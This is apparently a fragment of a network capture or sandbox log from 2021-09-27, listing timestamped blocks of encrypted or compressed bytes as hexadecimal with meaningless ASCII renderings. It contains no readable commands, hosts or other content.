                                        2021-09-27 17:14:38 UTC65INData Raw: e0 a7 d0 5a 67 f3 25 3a 32 6e d4 ea 95 6f 4f 21 4d 08 b2 1a 00 49 59 62 87 08 c3 2b e8 d6 7b 4a c0 99 7e 68 69 b1 9a 2a 32 d2 57 a2 bd 69 f1 6f b9 3b 7a 63 1f 7d 2c 00 cc 66 89 48 20 25 99 68 43 ff 84 3f 78 73 ec 0c 07 30 ac 0a 5f d2 fe 83 cb 89 97 7f 6b e6 dd ee cb ac e0 55 60 11 af e7 12 97 32 f7 0b cf 40 eb 32 6f 4c fb 92 22 c3 c6 0a 6d 31 5e 2f 29 83 2e f0 19 d0 b3 2f c4 1d bf ba 1f 0e 2d d7 7f 35 f9 f5 67 e8 a4 97 50 d5 d2 52 3b 36 bf 0d 33 9b db 71 43 d3 07 aa 2f 43 4b 7a 7e 84 25 3b 98 bc f3 e6 1b 28 00 b2 7a 3c bc 96 bb 77 d0 c3 00 c5 99 e4 5b 47 44 0c 35 cc 59 bd d6 db b7 d5 19 8f 4a dc 12 59 26 a4 92 d4 18 84 04 6d d8 5f 05 2d f7 48 bb bb 1c b9 7d 6a b9 54 26 4e 94 d1 18 dc f0 1d b8 e4 8f 5e 19 fb 30 e4 eb f1 08 24 cd 43 5c e1 46 33 fe 28 24 25
                                        Data Ascii: Zg%:2noO!MIYb+{J~hi*2Wio;zc},fH %hC?xs0_kU`2@2oL"m1^/)./-5gPR;63qC/CKz~%;(z<w[GD5YJY&m_-H}jT&N^0$C\F3($%
                                        2021-09-27 17:14:38 UTC66INData Raw: 98 c8 97 44 07 91 09 ce 6f 6f 7a f3 0a 98 ab 42 bd 53 f3 79 25 c9 82 8b 23 40 22 84 70 49 6f d8 fc ca 07 2e 99 aa 96 32 01 ea 9d 9d 65 90 cc 66 cb 45 dd 38 0a e9 70 d0 50 67 f5 24 85 5c 7f c2 f3 6b d7 57 0a 0e 31 f8 09 27 52 69 a5 2d 4c e0 29 e9 c3 64 52 c4 19 6f 7b 7a 98 a7 0a 23 f6 52 bc b3 f6 da 1c 9b 38 d8 74 2e 79 15 a3 d8 4e e8 64 7a 23 80 ef 6c 15 85 3e 61 79 29 2f 11 2b 8a 06 4e d2 f4 e6 4d 9a b5 6e 6c 72 f5 38 d8 b5 53 4a 55 84 b9 f5 3a 87 21 d1 10 4b 47 d8 39 c0 62 d8 86 37 78 5a 03 79 19 ed 3c 0d 98 15 c6 82 73 a2 0b d2 1d 0b 04 3b 16 30 67 41 00 e0 ca 4d ef a4 9d 77 d7 d5 55 88 0c a5 04 9c b2 41 59 53 71 16 83 28 65 e8 5e 66 1e 16 4f 05 a0 eb 7c 32 2f 28 40 71 2f a4 bd f6 9c 07 bf 15 d6 92 e3 ce 53 52 34 96 d9 4d a9 d0 fe 29 4e 18 85 6c dc 10
                                        Data Ascii: DoozBSy%#@"pIo.2efE8pPg$\kW1'Ri-L)dRo{z#R8t.yNdz#l>ay)/+NMnlr8SJU:!KG9b7xZy<s;0gAMwUAYSq(e^fO|2/(@q/SR4M)Nl
                                        2021-09-27 17:14:38 UTC67INData Raw: 76 83 ab 55 08 ed af 08 b5 ec 7f 21 e6 04 92 78 0f 47 99 57 f7 f7 3d bf 4f a7 94 ce 67 ab 15 a7 08 c3 db a8 0c f5 f6 45 27 1c dc 1a 11 6b 12 4d eb 71 e4 b3 e3 a2 14 62 0b 21 f1 31 71 5b 53 83 95 11 89 87 42 40 da 42 76 7d 82 da d5 5d 28 2f da f7 cd d4 12 9f 10 05 81 99 dd e5 99 ad cf e4 f9 a7 5e d0 e4 39 36 38 8e 04 2a 29 3a f4 c2 32 21 73 00 dd 27 a9 39 77 ed ec 60 cc df 51 5a e3 b9 fb 48 9a ef 93 98 b0 40 85 b5 56 a3 9c e3 a6 4a 29 b3 a0 06 ff 6d da 01 99 9e 65 4e 78 d3 dc 6a 16 3d 12 3b 89 d6 84 e3 f5 0d 54 bb 15 4b be 9b 59 74 67 e6 21 4e 08 79 93 6e d8 16 f8 a4 41 9c 42 2a f5 fe 93 f7 a6 df ea a2 8f c9 d3 ca 29 f9 66 cf c9 31 31 e8 37 69 04 e4 56 ee ed 45 57 a1 ec 3e 2f 65 a6 bb 6d 0b 74 44 37 ec b8 1c d3 3b 02 bc 7f 75 b3 15 d0 13 33 92 ea 9c 18 f8
                                        Data Ascii: vU!xGW=OgE'kMqb!1q[SB@Bv}](/^968*):2!s'9w`QZH@VJ)meNxj=;TKYtg!NynAB*)f117iVEW>/emtD7;u3
                                        2021-09-27 17:14:38 UTC68INData Raw: 45 1f 58 19 d6 0d dc f1 0e 81 f5 ac 49 14 47 09 e4 8a f0 aa 35 7e 57 74 42 35 52 f5 08 fe 28 d8 c3 94 4a a0 78 8f 9c 31 24 98 09 97 72 e2 b3 0f 34 d3 35 da e4 89 cc ca 52 2a 06 c9 66 b1 56 43 6f 51 23 06 ec 46 e6 f1 9f e2 58 82 54 8b ac 3f f2 34 40 3c 2d 5a 3e 78 49 0a 09 ef 32 19 04 92 70 b2 d0 8f d2 1a 24 92 eb e1 ae e0 c7 56 24 49 fa 03 5e bb 6c 9c 38 21 c6 f3 d8 e1 92 c5 af d0 de 12 09 c2 52 c1 bd b0 4a 56 90 46 09 02 87 dc d2 66 1d f6 6a d2 ea a8 da e2 01 a9 92 2d 53 75 bc ff d3 a5 71 f4 26 60 37 69 a5 44 a7 3e 1e aa fb 2c 49 4e 1b cc cc 12 2e 88 a6 d7 da 7a 98 1e 7f e4 04 09 e0 37 52 80 ba 92 de 3c 84 ab eb 89 2c a6 b2 bd fb f0 14 1b 0d f3 ad c5 63 e3 76 be dd 8e 1b 53 bc 7d 16 36 cf 13 b2 30 80 3d 6f ad 4d 1d 18 79 f4 c1 bd 63 cd df 52 89 83 27 06
                                        Data Ascii: EXIG5~WtB5R(Jx1$r45R*fVCoQ#FXT?4@<-Z>xI2p$V$I^l8!RJVFfj-Suq&`7iD>,IN.z7R<,cvS}60=oMycR'
                                        2021-09-27 17:14:38 UTC70INData Raw: 9d 7b 26 98 f4 ed d1 00 2e 41 aa 96 32 46 7a 98 9d 69 81 9f 65 cb 43 bf d2 14 e0 ac ac b5 77 e1 38 a0 05 01 2a ea bd ce 58 fb 54 32 fb 1e 38 64 4f b4 0a 5d 3c 2a e9 cf 7d 4d d7 fb 68 79 7a 93 cf 29 30 d4 4e c2 1b 7b e5 16 88 3e 6b 62 21 4f 43 2d d8 4e e8 44 31 27 ef e5 46 ff 8e 45 6a 53 fd 24 7e 91 a3 22 44 c1 f9 98 6e b5 b0 50 9f 6a e2 ee dd 20 69 44 42 08 ad f0 2b 81 3a e6 05 02 51 cb 21 46 26 da 84 36 d0 24 97 6c 31 55 14 1c 92 0a ec 1d 4a b3 0d fe 0e fe 1d 3b 16 3a 5a 68 7e 9d dc c0 e2 74 88 76 c4 f7 6c bf 1a b4 16 23 9d 50 5f 7a 4f 07 a0 36 65 53 5f 66 12 1a 35 a2 96 fa 7a 47 2b 00 b2 6b 3c ab 96 af 4b f0 41 02 c3 8c fa c7 48 6c 90 34 d8 47 81 4e f2 10 df 34 e0 1f ef 01 4d 08 db 9f c5 17 9a 98 6e b7 5f 06 39 e9 27 af 91 bb b3 12 4a 9d 45 2e 48 10 c7
                                        Data Ascii: {&.A2FzieCw8*XT28dO]<*}Mhyz)0N{>kb!OC-ND1'FEjS$~"DnPj iDB+:Q!F&6$l1UJ;:Zh~tvl#P_zO6eS_f5zG+k<KAHl4GN4Mn_9'JE.H
                                        2021-09-27 17:14:38 UTC71INData Raw: f5 57 ab 04 a5 c9 ca 23 83 20 be fb 42 3b 03 84 86 0e 67 01 45 eb 70 ee ac f4 4a 17 4e 18 28 f3 27 73 cf e4 92 91 1c d6 81 40 6c d0 64 69 7f 91 d2 c4 4e 23 1d 50 f6 e1 d7 06 8f d1 80 d8 02 c2 de e5 ad de e6 f4 c3 55 22 ff 00 06 20 91 65 9e 1b 2b fc c4 29 01 55 fe dc 01 7d 28 76 dc f2 3e 50 c0 58 49 eb b9 f2 58 85 e8 77 99 9c 4a 9e 9d 3b 8a b4 e3 ac 55 3a a0 a8 17 f8 6e ee 08 67 98 5e b7 68 fb d3 6d 0e 2e 1d 2d 66 df b7 f0 1c 07 78 b5 1c b3 a2 86 3c 40 77 de ca 4c 1a 1e 11 7e 26 1d fe ae 50 9a 4e cc e3 f8 34 e7 b5 d7 67 b3 87 c1 05 e5 07 f0 71 c3 ac 94 26 74 27 70 13 fe 6f 5d f5 bb 5c 9e e2 08 8c 4c a6 bd 60 30 5d 5f 24 e2 ab 09 ca 21 39 36 7a 59 bf 4e f2 11 33 92 ce b2 0c eb 66 f6 c8 74 63 65 1a 18 a2 94 d1 ac 55 ec 67 39 e9 cc 9e 2b 59 42 63 70 65 3d e4
                                        Data Ascii: W# B;gEpJN('s@ldiN#PU" e+)U}(v>PXIXwJ;U:ng^hm.-fx<@wL~&PN4gq&t'po]\L`0]_$!96zYN3ftceUg9+YBcpe=
                                        2021-09-27 17:14:38 UTC72INData Raw: e2 85 f3 25 d1 ad 75 5f b4 5a 3f 9a 33 06 d6 94 97 78 fb a5 15 23 ca 24 e4 6d 88 42 7b 2b 51 00 c9 6c bb 45 40 a1 6e 56 8b b3 4c f2 d8 45 f0 5e 95 47 10 ba 3a 7c 82 5c 3e 56 85 9c 78 43 26 29 00 ca 18 0e b0 fa b2 c1 8d f0 cb 34 b7 c5 c5 a4 f1 c6 6d ac 5c f0 21 4b 84 7d 9c ce ae c1 d9 d2 cc a4 b7 9d d2 de 14 1a ce 43 83 db 27 5f 4c 96 29 22 13 b7 d8 c3 58 0c fd 05 67 e8 a8 cd e5 06 93 83 42 72 60 42 f8 ee ab 78 f6 49 4f 23 97 a2 6e b4 25 7a b2 fd 34 bd 91 38 eb cf 27 05 6b 84 53 d7 52 aa 1c 57 88 db 09 fb 5d 52 57 a9 9d e5 39 95 bf e5 21 d2 9f 4c 63 ea 47 3c 2c 1c 80 1d d6 6d ef 71 be cb 8c 1b 5f 71 7b 38 32 c4 39 b4 3c b2 12 6e ad 4b 16 30 58 7a c1 bb 4b d9 de 52 83 6a 5e 02 fc ae 1f 63 ff 6b 30 e8 14 80 49 a7 99 dd 72 df c0 ab be 45 b4 7a e7 5f ab 04 ad
                                        Data Ascii: %u_Z?3x#$mB{+QlE@nVLE^G:|\>VxC&)4m\!K}C'_L)"XgBr`BxIO#n%z48'kSRW]RW9!LcG<,mq_q{829<nK0XzKRj^ck0IrEz_
                                        2021-09-27 17:14:38 UTC73INData Raw: b7 cd 57 7c fe 3c 2a 1c 60 cb e0 9d 46 4f 21 47 bc f9 14 1f 4f 6e 40 0a 23 c3 b7 f8 cb 6a 51 cc ff f4 6a 74 86 ba 37 7e 48 55 a3 b4 75 c5 f7 9b 39 7a f9 1d 63 2e 14 df 3d 6f 4d 20 25 93 e1 9a eb a1 16 5c 51 fd 24 02 27 a4 2e 66 ea fe 89 63 45 72 68 7d 6a f3 ea e3 f9 46 44 44 66 39 f4 3a 80 24 09 00 7c 55 a6 a9 4d 5d de 90 c8 d8 5d db 6c 51 73 3e 0b b8 1c f7 0a 23 2a 0a d3 0d 34 71 28 19 29 42 56 99 ee dd c0 f9 a0 8c 7f ec 6b 40 ab 1c db 96 11 8d 47 4a 5a c2 03 b1 35 65 ac 5d 66 12 66 ba 88 9f ed 6f 3e 28 04 a3 79 07 30 83 aa 65 97 ca 03 c5 99 e1 d1 33 4c 0e 34 de 5e a5 e9 64 10 d5 13 94 60 dc 04 65 68 c9 96 de 17 83 8c 05 d2 5d 04 3f 8c 4b ad 93 b1 aa 77 13 bd 47 28 5f 0a dd 09 d7 d9 91 9f f5 aa 27 25 75 0f e2 fa fb bb 38 81 73 76 53 40 22 ff 19 fe 4a f7
                                        Data Ascii: W|<*`FO!GOn@#jQjt7~HUu9zc.=oM %\Q$'.fcErh}jFDDf9:$|UM]]lQs>#*4q()BVk@GJZ5e]ffo>(y0e3L4^d`eh]?KwG(_'%u8svS@"J
                                        2021-09-27 17:14:38 UTC75INData Raw: 16 64 1c a3 f6 31 71 40 40 8c 85 05 af 95 47 ce cb 4d 65 77 93 ca d0 4b 3c 8a 81 f7 cd df 04 99 d7 8e 9c 89 45 dc fc ba e7 49 ef 3d 5e 28 e7 00 17 a8 a2 11 13 17 2e 6e ec 29 09 4b 0a 0d 38 77 39 70 ef f9 70 cc d5 79 6e e2 b9 e9 24 8f fd 89 99 a3 44 87 82 40 8b 10 e7 a6 4c 3b 3e a7 17 e9 67 e2 0a 88 89 64 98 df fb de 74 bf 2c 05 39 63 c3 80 42 e2 06 5e a8 25 12 bb b7 5d 49 e8 ca c2 4c 0a 02 1a 7a f0 bf d2 a4 4b b4 c5 1a f0 f4 38 ff b7 d8 73 8a 2a dc fb e2 3c 74 67 c4 ba 8a 22 f8 2c 73 0d d6 d6 51 ed 43 ff a3 f9 02 15 73 8e 1e 61 23 50 52 1f 4d af 18 c4 28 a7 cf 7b 75 b4 29 e0 07 1b 3b c2 ad 12 d0 f2 f6 d9 76 6f 63 f5 10 a2 ca d6 b6 7b 7c 69 2a eb e1 df 32 4e 61 d1 60 41 4d 7a ec db 02 2b 8a dd b4 36 6e f5 8f 97 7e a3 19 6f e3 52 cd 2e 13 8f 82 c1 48 70 f0
                                        Data Ascii: d1q@@GMewK<EI=^(.n)K8w9ppyn$D@L;>gdt,9cB^%]ILzK8s*<tg",sQCsa#PRM({u);voc{|i*2Na`AMz+6n~oR.Hp
                                        2021-09-27 17:14:38 UTC76INData Raw: 42 7d 3c f4 13 c9 6c b0 3e 49 b7 46 ff 8f dc 58 e4 f0 99 ff 41 99 5c 9d b4 25 60 7d 49 06 57 a9 17 44 46 2c 07 8a e2 36 04 98 69 a0 81 9f da c4 35 a8 de db ae e9 d2 4f dd 5c dc 3e 62 93 5b 93 e6 27 d6 f1 f6 e1 92 ce a9 90 04 12 09 c2 4d 84 fe b0 52 53 84 b8 09 3d b9 0e c9 54 1d f4 42 57 ea a8 c1 f8 15 97 84 2d 5d 7d 52 00 fe 8b 7b fb 0e 5e 24 97 a2 7e 8d 07 15 aa f6 22 84 22 28 df ea 10 0c 74 82 be db 56 9a 24 e0 83 05 09 f5 55 48 81 b3 87 fa c2 85 9c d5 5a 0c 60 b3 bf d3 76 14 1b 16 8c 08 ca 6e e9 75 89 e9 72 1a 79 a1 a9 21 18 cd 11 9c 28 f3 26 64 a1 54 0d 3d 58 f9 de a2 b5 ef f3 47 87 83 64 07 fc a7 09 4b d1 71 30 e2 03 c0 01 58 66 69 6d c5 cd 3d b6 52 4a 9a ca 5d b3 18 ad df dc ce 7c 0d 98 ff 41 0f 26 d9 1a 17 7b 3a 63 eb 61 ec a5 a3 7e 16 62 0b 31 e5
                                        Data Ascii: B}<l>IFXA\%`}IWDF,6i5O\>b['MRS=TBW-]}R{^$~""(tV$UHZ`vnury!(&dT=XGdKq0Xfim=RJ]|A&{:ca~b1
                                        2021-09-27 17:14:38 UTC77INData Raw: e9 d6 45 5e d3 bc 68 7b 7a 3c b4 28 23 c2 4f 86 b0 7a e2 0b 65 38 56 67 14 66 3d 16 ce b0 e3 60 22 34 8b e5 43 e7 7a 3f 47 53 d6 2c 3a c2 a0 59 22 d2 fe 8d 43 ba b7 6b 00 06 e2 ee cf 87 42 44 42 1a 8e f7 3a ae 32 f7 01 fc 51 c9 30 5a 56 f3 9d 36 dd 5c db 6c 1d 5d 24 06 92 0d f0 f0 4d 8e 09 c4 00 23 ac 23 e8 3b 67 6c 3a ec f6 23 ea df f0 76 c4 f2 6e 9d 18 b7 34 01 8d 41 53 2f be 07 a0 38 67 5a 5e 75 24 0b 30 a1 9f eb 7c 95 39 00 a3 66 24 85 9c aa 64 ef be 03 e9 9d ea dd 40 43 1a ca d9 61 ab d6 f8 10 d2 01 7b 6d e1 01 66 0c e3 75 d6 65 fc 89 6a dc 75 26 3b e0 21 c2 93 bb bd 57 66 b5 45 3b 69 1d d6 9a dc f1 0e 9b f5 ac 48 0d 5f 18 e4 eb fa a9 18 e5 7f 4a 56 46 35 87 2e f6 25 db d6 63 48 88 e8 98 9a 35 dc eb 08 97 79 d9 a2 1e 32 c8 5f eb f7 8c 48 55 a1 dc 07
                                        Data Ascii: E^h{z<(#Oze8Vgf=`"4Cz?GS,:Y"CkBDB:2Q0ZV6\l]$M##;gl:#vn4AS/8gZ^u$0|9f$d@Ca{mfueju&;!WfE;iH_JVF5.%cH5y2_HU
                                        2021-09-27 17:14:38 UTC79INData Raw: f3 e7 de 17 88 d5 af 88 9e f1 cd ed ad c7 ee ef 2c 42 05 dd 0a 01 3f 99 f0 03 2b 3a ec cf 38 0e 5d fe dc 01 75 2e 7a c7 ea 68 32 de 7d 58 c8 bb c8 b3 98 86 f5 98 b0 45 bc a7 56 a0 c8 9f a6 4a 28 99 a0 17 e9 75 c1 18 99 b1 72 b0 79 f7 de 72 0c 2b 1e 06 6c d7 af f6 1c 07 78 be 15 be bf b0 4d a1 64 e1 c0 5b 00 16 09 76 26 1d fe a6 6a 9e 72 f9 f2 85 56 f6 a6 db 4d 80 8d db 86 99 2b f9 64 ee ba 8b 31 fb 0d 61 1b d6 7e 55 ed 4d 5d b2 f8 00 0a 4c bd bd 66 34 a4 47 1b e8 b3 13 c2 39 3c 36 7a 59 b7 2a ff 13 34 80 3c ac 34 fa 45 f4 f2 9f 7e 10 9a 19 8e 97 ed 9d 51 f0 15 54 e1 cc 8b 09 7c 4f b5 66 49 65 ff ef cc 75 85 c9 ae 92 1e 7d c3 9e 9d 47 a9 08 66 c3 45 cc 3f 03 eb 8d d8 48 71 f6 cc b7 21 6c cc e0 bd c3 59 df 46 0c ea 0d 0b 43 49 ac f4 22 ef 29 c2 c7 5e bf d1
                                        Data Ascii: ,B?+:8]u.zh2}XEVJ(uryr+lxMd[v&jrVM+d1a~UM]Lf4G9<6zY*4<4E~QT|OfIeu}GfE?Hq!lYFCI")^
                                        2021-09-27 17:14:38 UTC80INData Raw: 83 48 b6 44 b2 14 58 a4 2c 01 9c 56 1e 1b b4 7c 91 5d 8d c7 e9 2a c2 5f d0 b1 ce d1 d9 25 42 df 0b ed bb 6c 96 7a 27 df e9 c7 a8 0e c2 a0 e1 c8 8e 0f dd 60 af 2f b0 5b 4c 0c 40 17 22 a8 d1 4e 52 02 c2 75 73 76 ae d4 c1 2a 22 89 2d 54 fe 44 e1 c9 87 f7 ff 26 67 bd 91 bb 5f 85 d4 15 aa fc a8 b1 50 0f d1 ee 8c 03 74 b7 60 5f 7a 92 1c cb 84 1a 33 ca a9 45 81 ba 04 f2 23 bf 90 13 8a 2c 60 2f bb e4 5e 34 b1 1c 80 17 59 65 f6 41 89 86 10 1d 4a 91 59 ff 18 cd 13 28 3a ec 19 70 31 4d 09 70 43 6c c7 a4 0a f1 a6 ce 85 b4 1d 15 60 a7 00 20 df 93 30 e8 15 1c 4f b8 dd b6 e5 df c0 3d 23 43 ab de c6 87 ab 15 ad 4a c5 c2 c4 2c 1b ea 45 27 80 da 05 56 4d 92 4d eb 61 7a b5 fc fc 09 5a 97 28 ee 78 6e 21 cf 85 8b 40 a6 8f de 6a c5 09 69 16 1e dc db 13 34 09 32 f1 d2 93 08 e0
                                        Data Ascii: HDX,V|]*_%Blz'`/[L@"NRusv*"-TD&g_Pt`_z3E#,`/^4YeAJY(:p1MpCl` 0O=#CJ,E'VMMazZ(xn!@ji42
                                        2021-09-27 17:14:38 UTC81INData Raw: 11 d8 4a f4 64 b2 22 80 ef 4f e6 88 3e 63 47 03 2f 3d 23 b5 2e 4e da e7 77 68 b4 b7 43 7f 41 2f c6 5c ad 42 4e 45 13 b9 7b 8d 9c e8 98 14 6c 51 c3 0b 4c 5d d8 95 06 df 4b d0 6d 31 5f 90 0d 92 1b f0 03 67 e1 0b da 13 dd aa 17 13 3e 5f 3f 08 e3 dd c9 ff 5a 9c 5a c6 ee 49 ab 13 ae e2 11 a1 45 4f 78 c8 0a a0 35 54 a4 5f 4a 1e 0b 18 b8 9f eb 76 1e 2f 1a bf 70 26 b8 79 ab 4f fa 57 0f c5 96 e9 28 41 68 0e 1f da 66 12 b2 da 12 d5 13 8e 6b a2 29 4f 0e c2 94 bb 35 90 89 60 df 30 2e 3b e3 56 84 28 bf b9 7b 48 77 44 28 53 1d 86 14 ce f3 26 c6 f5 ac 42 27 cb 0b e4 ed d8 8e 35 ee 5d 5c 23 47 33 f2 0c fc 0d 4d ac 61 41 f1 5a 07 9a 33 06 d6 cc 95 78 f7 9e 2d 33 c2 3a e4 d9 8e 42 77 3e f4 c3 cb 6c bc 79 73 b5 46 ff e4 9e 44 e6 fa 94 9c 74 91 51 97 aa 55 52 81 48 20 45 c2
                                        Data Ascii: Jd"O>cG/=#.NwhCA/\BNE{lQL]Km1_g>_?ZZIEOx5T_Jv/p&yOW(Ahfk)O5`0.;V({HwD(S&B'5]\#G3MaAZ3x-3:Bw>lysFDtQURH E
                                        2021-09-27 17:14:38 UTC82INData Raw: 4d 21 4d 37 32 09 13 50 42 8c e5 23 c3 2b ee d4 79 33 e7 96 68 71 52 24 b0 28 34 c2 6c 83 ab 7a ef 0a a8 32 73 4d b2 69 3d 17 b7 82 e2 4c 2a 24 91 e9 2b cb 86 3e 61 79 42 2a 11 27 b4 0a 60 d2 fe 83 7f ab be 61 55 aa e6 ee cd c2 8e 44 42 03 b9 e4 36 e9 06 f5 01 67 79 08 25 4c 5b ce ae 18 da 4b 2f 7b 02 54 35 25 50 0e e6 08 23 6e 0b d3 01 24 ba 37 79 0e 49 6e 1b c6 1e c4 e8 a2 8b 5e ea f6 44 a1 0c 87 17 19 a5 85 5d 52 d5 68 6c 3c 4d 50 59 77 18 66 04 8b 9f e1 54 f6 3d 00 b4 66 07 80 87 aa 69 ee 73 09 cc b7 34 d2 40 42 63 f8 d8 4d a3 c6 e2 1c ba 2d 87 6c c7 2b 8a 0a c8 90 c2 36 bc 89 6a d2 49 37 32 ea 74 64 97 bb bf 12 ac 9f 45 22 71 d0 d2 18 da f6 1f 97 9a 98 4a 0f 7d 60 07 ea f0 a0 20 dd 59 7d 54 57 3f 9b 3c f6 25 db c3 ad 4b a0 78 8d 96 24 da ed 04 86 74
                                        Data Ascii: M!M72PB#+y3hqR$(4lz2sMi=L*$+>ayB*'`aUDB6gy%L[K/{T5%P#n$7yIn^D]Rhl<MPYwfT=fis4@BcM-l+6jI72tdE"qJ}` Y}TW?<%Kx$t
                                        2021-09-27 17:14:38 UTC83INData Raw: 84 42 6c cb 47 60 65 f9 1c c4 5f 2f 04 3f e8 b2 81 a3 14 d7 9a 9c b6 e2 cc ed a7 e5 f1 e6 2e 5d 0e e7 18 18 c6 8f 22 09 19 b5 df c4 38 08 58 05 c7 3e 7e 39 60 ce f7 8e cd f3 5c 5e e0 63 6f 6f 9a fd 88 8b b4 5a 85 8c 54 b2 bc f8 58 4b 00 b6 b6 1d f5 75 f8 1a 88 90 6e 4e 78 d3 f1 63 19 2b 99 12 77 d7 a9 f7 ca 3d 56 bc 07 a4 bb a8 52 d3 5a cd c2 4d 1d 3e 32 6c d8 16 fa 99 43 9c 53 32 47 fe 2b fc 9f b8 98 5d 70 c5 e8 ed 2b e8 69 dc 44 8a 1d e2 39 74 cd 00 75 57 ed 5c 4e bb e9 07 08 7a 58 bc 4d 25 4c 2c 1d f4 b8 11 c2 2f 23 de 85 74 99 3e e3 00 3a 98 d3 a4 07 f1 90 f7 f5 7e 57 6e dc 0f 71 6c 38 ae 57 ec 61 a6 de cc 8f 22 50 65 6c 70 49 6f d9 ef cc 02 11 c5 b3 9b 22 7d f5 9a b1 77 b8 0d 70 c9 3e 0a 2e 15 e4 a2 d4 92 e7 7d 36 a1 d7 90 df e9 bd d3 5c 27 43 37 32
                                        Data Ascii: BlG`e_/?.]"8X>~9`\^cooZTXKunNxc+w=VRZM>2lCS2G+]p+iD9tuW\NzXM%L,/#t>:~Wnql8Wa"PelpIo"}wp>.}6\'C72
                                        2021-09-27 17:14:38 UTC84INData Raw: 8f b5 35 d8 f2 93 f9 4f 96 22 d9 bf 3a 76 ab 0e 28 42 a7 17 3f 41 2c 0b 95 dc 8e b3 f7 76 b7 c1 81 a5 16 35 b7 c7 c9 89 f3 c2 45 32 52 ef 33 98 ba 40 91 f0 32 c9 c6 c1 f2 9d c4 ae df c1 02 f7 c3 7e 9a f1 b6 df 5d 98 6e 52 11 b7 d4 bd d6 1c f6 6c 50 ed b7 da e7 05 82 98 22 4b 40 bc ff d3 b2 60 ee 2f 65 5a 5d a4 68 a1 20 04 a3 6a 83 26 21 a8 d1 c4 03 0a 6b 9f 4f c5 54 6c 1d 7b d2 07 72 23 58 45 85 b2 89 f0 ea 0b 9b db 8a 2e 48 f4 bc fb 68 16 60 da 80 17 c1 65 9a 42 94 f3 86 0a 50 dc 3d 3c 18 c7 3b f2 3e f3 2c 67 bb dd 65 74 5a f0 cb 93 0d ec df 58 ab ec 5d 02 f6 a8 08 f5 48 1e 25 e9 15 8a 34 74 99 96 76 c0 ef 2e b0 45 a5 94 f9 75 55 14 81 df fb cc 80 0c b4 f5 6e 34 13 dc 0b 1e 72 25 b3 ea 4d 91 b1 98 7d 16 62 0f 26 e0 35 a7 ce 78 83 94 08 91 c3 43 6c d0 40
                                        Data Ascii: 5O":v(B?A,v5E2R3@2~]nRlP"K@`/eZ]h j&!kOTl{r#XE.Hh`eBP=<;>,getZX]H%4tv.EuUn4r%M}b&5xCl@
                                        2021-09-27 17:14:38 UTC86INData Raw: de 6c ea a9 7a ef 04 f4 bd 7b 65 0a 67 22 1c cb 41 e2 5d 2f 3c cc 1b 45 d3 c8 3c 69 52 8e 10 13 21 a8 3c 24 a1 ba 8b 69 92 9d 2e 7f 6a e8 c6 8c af 42 4e 58 66 3a f4 3a 80 41 c9 03 6d 5b b7 1e 4e 5d d2 ae 76 d8 4b 2f 6f 4a 98 3c 0d 96 79 a7 0c 4c a8 23 91 09 23 a1 13 55 38 4b 64 7e 6b dc c0 ee bb d0 65 cb f6 55 a4 05 90 e2 11 a1 4d 48 5b c9 39 71 3f 4d 5a 41 43 07 06 30 98 90 f4 76 cd 38 2c b8 66 28 bd 8a b9 67 e7 4b 11 ca 9f e3 d9 58 ba 0d 18 cb 4f d2 07 f3 10 d1 1a 01 fd d2 0e 0d 2c cb 96 d4 07 81 86 6a c9 50 1b 19 1d 5d 80 b2 b2 a8 74 69 8e 4c be 46 15 bc c2 b0 d2 0e 9b f5 ac 48 0f 77 4f bf c3 61 aa 35 e4 ee eb 4c 67 20 fb 08 e5 2a ce 91 9f 4a 8c 05 9e e1 fa 0c fe 0c 9f 69 f5 60 91 19 c2 30 ce dd c5 40 7d 37 de 7c 0f 6c ba 55 52 c6 78 f7 8b b9 57 e3 83
                                        Data Ascii: lz{eg"A]/<E<iR!<$i.jBNXf::Am[N]vK/oJ<yL##U8Kd~keUMH[9q?MZAC0v8,f(gKXO,jP]tiLFHwOa5Lg *Ji`0@}7|lURxW
                                        2021-09-27 17:14:38 UTC87INData Raw: cf ec c7 75 56 0e fc 65 22 38 8e 15 7f cc 38 f4 c0 13 1a 49 08 f5 77 77 39 7b d0 3b fd e6 df 51 58 9e 72 e3 50 9e eb 81 b0 ea 41 96 8f 47 b2 a6 e5 9e db 29 b3 a0 15 ea 15 cf 18 99 93 6c da 0a bb dc 72 17 15 53 2f 77 dd b9 e7 fa de 27 fd 0f b5 b5 9f 1d 5d 65 c7 ea 0b 09 16 04 76 b7 98 d3 a4 47 97 5a 69 ce fc 2b fc b9 bb 0d d1 cb da fb ee 03 bc 62 c4 b0 9d 1f ec 3a 60 cc f5 7c 52 69 2a dc b3 e9 10 8d 58 a6 bd 60 30 56 44 30 6e ba 14 ea 64 2a c8 71 1a 37 3c f4 15 20 92 c0 aa 94 be 6e f6 d8 6d 70 6c 68 5f 8e 93 c6 97 f8 f3 68 20 c9 ff 8e 23 4c 5a 11 4e 49 65 f4 c5 e8 09 06 c3 86 cc 34 6e f9 f3 1c 6e a9 0e ea f4 45 cc 2f 06 e9 a4 b8 83 76 e1 36 bf 1c 68 02 64 97 c4 4f 23 45 27 64 5c 00 43 4f a5 06 24 4f 6d e9 c5 74 74 78 94 68 71 52 aa b5 28 38 c3 c8 92 ab 7a
                                        Data Ascii: uVe"88Iww9{;QXrPAG)lrS/w']evGZi+b:`|Ri*X`0VD0nd*q7< nmplh_h #LZNIe4nnE/v6hdO#E'd\CO$OmttxhqR(8z
                                        2021-09-27 17:14:38 UTC88INData Raw: 40 9a 63 bc e9 cd da c4 3f a6 c7 a5 ef e2 cd 4f 0b 1b f2 2b 6c 93 2b 94 e6 2b d1 dc c9 ec 1d ed bf d0 dc 69 c4 c2 52 8b 44 df 4e 4d 90 4c aa 3a e3 dc a9 9f 1d f6 6e 4a fb ae 1d 7b 20 82 89 2f 2f b2 42 fe fb b6 64 fd 21 14 1f 95 a4 62 b4 21 66 ee fe 34 bd 67 71 cc e7 1a 14 6f fd 01 d8 7a 98 34 11 80 05 03 c2 1f 47 81 b0 89 f1 2d 89 3f f2 8a 2c 62 c8 70 fb 62 10 ac 73 04 16 c5 65 c1 30 94 f3 86 b9 44 ab 13 2f 1d dc 1e 3b 15 f3 26 6c d6 86 16 30 5c 26 76 a8 4f ff d2 45 55 b8 52 13 f1 b0 0d 5d 6a 8c cf 17 04 86 5e 71 8a 90 63 d9 d1 2c 81 23 4e 64 19 67 a2 14 ad d6 c1 a6 44 0c b4 ee 46 a3 8d c7 5a eb 6d 12 4d e9 62 95 8d e1 b4 1c 7b 61 5d b5 33 71 4b 7b c5 96 0a b3 ac 05 6e da 48 6e 08 06 db c4 59 58 39 ac f7 c7 a0 28 8a c6 95 a2 de db cd e7 85 84 ec ef 37 47
